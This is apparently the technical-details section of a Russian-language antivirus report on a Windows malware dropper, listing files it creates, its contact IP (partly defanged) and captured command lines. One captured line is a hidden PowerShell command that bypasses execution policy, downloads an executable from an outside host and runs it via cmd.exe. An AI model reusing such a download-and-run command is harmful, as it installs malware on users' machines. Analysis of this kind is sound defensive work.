Техническая информация
- http://18#.#02.170.122/gevaldigere.exe как %appdata%\gevaldigere.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Gevaldigere.exe
- %TEMP%\abdtfhgygeghdpš.sct
- %APPDATA%\gevaldigere.exe
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\folkebaaden.ram
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\nmdllhost.exe.manifest
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\enthraller.cam9
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\folder-videos-symbolic.symbolic.png
- %HOMEPATH%\pictures\giraffish220\tallest\supines216\msador28.tlb
- %ProgramFiles(x86)%\demonstrationsmodeller.ini
- %TEMP%\nsu7abc.tmp\system.dll
- %TEMP%\nsab8b6.tmp\system.dll
- %TEMP%\nskc794.tmp\system.dll
- %TEMP%\abdtfhgygeghdpš.sct
- '18#.#02.170.122':80
- http://18#.#02.170.122/Gevaldigere.exe
- ClassName: '#32770' WindowName: ''
- '%APPDATA%\gevaldigere.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\Gevaldigere.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://18#.#02.170.122/Gevaldigere.exe','%APPDATA%\Gevaldigere.exe')' (со скрытым окном)